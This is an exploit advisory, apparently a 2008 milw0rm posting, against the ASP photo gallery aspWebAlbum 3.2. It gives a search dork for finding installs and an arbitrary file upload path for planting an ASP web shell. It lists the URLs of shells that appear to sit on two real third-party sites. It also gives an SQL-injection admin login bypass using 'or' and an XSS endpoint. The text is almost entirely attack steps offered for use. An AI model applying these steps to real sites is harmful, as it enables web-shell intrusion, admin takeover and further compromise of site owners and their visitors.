################################################################################################## # #-# Discovered bay Alemin_Krali <<<<<<<<==== # # # # #-# aspWebAlbum 3.2 # # #### ## ## # # # # # # # # # # #-# Script Download "http://www.fullrevolution.com" ##### # ### # # # # # # # # # # # # # #-# aspWebAlbum 3.2 Single Site License | $60.00 : ) # # ### #### # # # # #-# HomePage al3m.blogspot.com # # #-# alemin@windowslive.com # # #-# Dork ? : album.asp?pic= .jpg cat= # # # ######################################################################## # # # # # # # # 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] # # ######################################################################## # # # http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! # # and your shell adress: # # http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp # # # ex:1 # http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp # # ex:2 # http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/ # Ablaze rally 9-24-06/pics/klasvayv.asp # # ######################################################################## # # # # # # # # 2-Admin Bypass [AspWebAlbum 3.2] # # ######################################################################## # # # # http://site.com/path/album.asp?action=login # # ASP/MS SQL Server login syntax # # Username:'or' # Password:anything # # ######################################################################## # # # # # # # # 3-Xss Vulnerability [AspWebAlbum 3.2] # # ######################################################################## # # # http://site.com/album/album.asp?action=summary&message=&from=login # # ################################################################################################# # milw0rm.com [2008-09-03]